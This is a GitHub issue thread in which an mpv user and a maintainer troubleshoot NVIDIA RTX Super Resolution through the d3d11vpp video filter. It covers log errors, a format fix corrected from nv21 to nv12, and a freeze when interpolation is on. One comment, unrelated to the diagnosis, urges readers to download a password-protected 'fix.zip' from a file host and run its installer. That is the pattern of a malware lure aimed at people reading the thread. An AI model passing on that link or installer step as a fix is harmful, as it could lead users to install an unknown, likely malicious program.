### ISSUE TITLE
RTS super resolution not working for some videos

### ISSUE THREAD

**Issue by deama** [mpv-player/mpv#14758]
### mpv Information

```bash
mpv v0.38.0-720-gcb4fdb53 Copyright © 2000-2024 mpv/MPlayer/mplayer2 projects
 built on Aug 25 2024 00:05:10
libplacebo version: v7.349.0 (v7.349.0-5-g82bf46a-dirty)
FFmpeg version: N-116759-g40dda881d
FFmpeg library versions:
   libavcodec      61.11.100
   libavdevice     61.2.100
   libavfilter     10.2.102
   libavformat     61.5.101
   libavutil       59.34.100
   libswresample   5.2.100
   libswscale      8.2.100
```

### Other Information

```text
- Windows version: 10 22h2 (pro)
- GPU model, driver and version: rtx 4080 551.86
- Source of mpv: https://sourceforge.net/projects/mpv-player-windows/
```

### Reproduction Steps

Enable RTX super resolution 

    vf=d3d11vpp=scale=2:scaling-mode=nvidia

### Expected Behavior

The RTX super resolution is enabled and is showing as being used in the nvidia control panel.

### Actual Behavior

It only displays as being used in some videos, but not others.

### Log File

[output1.txt](https://github.com/user-attachments/files/16780971/output1.txt)

[output2.txt](https://github.com/user-attachments/files/16780977/output2.txt)

### Sample Files

Here's a .zip containss 2 sample files, one output.mkv which doesn't work for me, and output2.mkv which works for me.

https://drive.google.com/file/d/1FFQNEm9gsgqT7U2tmYBdfpxW6N-P7Q0c/view?usp=sharing

### I carefully read all instruction and confirm that I did the following:

- [X] I tested with the latest mpv version to validate that the issue is not already fixed.
- [X] I provided all required information including system and mpv version.
- [X] I produced the log file with the exact same set of files, parameters, and conditions used in "Reproduction Steps", with the addition of `--log-file=output.txt`.
- [X] I produced the log file while the behaviors described in "Actual Behavior" were actively observed.
- [X] I attached the full, untruncated log file.
- [X] I attached the backtrace in the case of a crash.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kasper93** [comment]
```
[   0.185][e][hwupload] Unable to find a compatible upload format for yuv420p
[   0.185][e][autoconvert] Failed to create HW uploader for format yuv420p
[   0.185][e][autoconvert] can't find video conversion for yuv420p
[   0.185][e][vf] Disabling filter d3d11vpp.00 because it has failed.
```

Fixed by #14746, it will upload software frames more robustly now.

**Comment by deama** [comment]
> ```
> [   0.185][e][hwupload] Unable to find a compatible upload format for yuv420p
> [   0.185][e][autoconvert] Failed to create HW uploader for format yuv420p
> [   0.185][e][autoconvert] can't find video conversion for yuv420p
> [   0.185][e][vf] Disabling filter d3d11vpp.00 because it has failed.
> ```
> 
> Fixed by #14746, it will upload software frames more robustly now.

Hello, 
Please can you reopen? I'm having the same issue with the new version from yesterday, however interestingly, this time, it's reversed.

The videos that worked, don't work now, and the videos that didn't work, work now...
Here's the output from a video that worked last time but doesn't now:
[output.txt](https://github.com/user-attachments/files/16840664/output.txt)

**Comment by kasper93** [comment]
See https://github.com/mpv-player/mpv/pull/14768, you have to add `format=nv21` to your command.

**Comment by deama** [comment]
> See #14768, you have to add `format=nv21` to your command.

Doesn't work, same result as having without it. Logs seem to say similar stuff as well.

Also, I tried the artifacts provided in there, but they don't even enable the feature at all it seems.

**Comment by kasper93** [comment]
```
vf=d3d11vpp=scale=2:scaling-mode=nvidia:format=nv21
```

**Comment by deama** [comment]
Doesn't seem to work
[output.txt](https://github.com/user-attachments/files/16841275/output.txt)

**Comment by deama** [comment]
> ```
> vf=d3d11vpp=scale=2:scaling-mode=nvidia:format=nv21
> ```

Doesn't seem to wo
[output.txt](https://github.com/user-attachments/files/16841279/output.txt)
rk:

**Comment by kasper93** [comment]
> > ```
> > vf=d3d11vpp=scale=2:scaling-mode=nvidia:format=nv21
> > ```
> 
> Doesn't seem to work: [output.txt](https://github.com/user-attachments/files/16841279/output.txt)

Download latest version from https://github.com/shinchiro/mpv-winbuild-cmake/releases

**Comment by deama** [comment]
> > > ```
> > > vf=d3d11vpp=scale=2:scaling-mode=nvidia:format=nv21
> > > ```
> > 
> > 
> > Doesn't seem to work: [output.txt](https://github.com/user-attachments/files/16841279/output.txt)
> 
> Download latest version from https://github.com/shinchiro/mpv-winbuild-cmake/releases

Nope, still nothing:
[output.txt](https://github.com/user-attachments/files/16841402/output.txt)

**Comment by deama** [comment]
> > > > ```
> > > > vf=d3d11vpp=scale=2:scaling-mode=nvidia:format=nv21
> > > > ```
> > > 
> > > 
> > > Doesn't seem to work: [output.txt](https://github.com/user-attachments/files/16841279/output.txt)
> > 
> > 
> > Download latest version from https://github.com/shinchiro/mpv-winbuild-cmake/releases
> 
> Nope, still nothing: [output.txt](https://github.com/user-attachments/files/16841402/output.txt)

Ah, works if I change the format=12 instead of 21.

**Comment by deama** [comment]
> > > ```
> > > vf=d3d11vpp=scale=2:scaling-mode=nvidia:format=nv21
> > > ```
> > 
> > 
> > Doesn't seem to work: [output.txt](https://github.com/user-attachments/files/16841279/output.txt)
> 
> Download latest version from https://github.com/shinchiro/mpv-winbuild-cmake/releases

Ah, but I just noticed another problem, the video doesn't play but the sound does. It freezes on the first image. If I click on another timeline on the video, the freeze refreshes to that timeline's image of the video, but is still frozen whilst the sound plays.

This seems to happen if I have 
```
interpolation
video-sync=display-resample
```
Enabled in addition. They worked fine in the previous update though.

Should I submit this as a new issue?

**Comment by deama** [comment]
Ah, forgot to mention, here's the log file:
[output.txt](https://github.com/user-attachments/files/16841444/output.txt)

**Comment by kasper93** [comment]
Oh, my bad. It should indeed be `nv12`
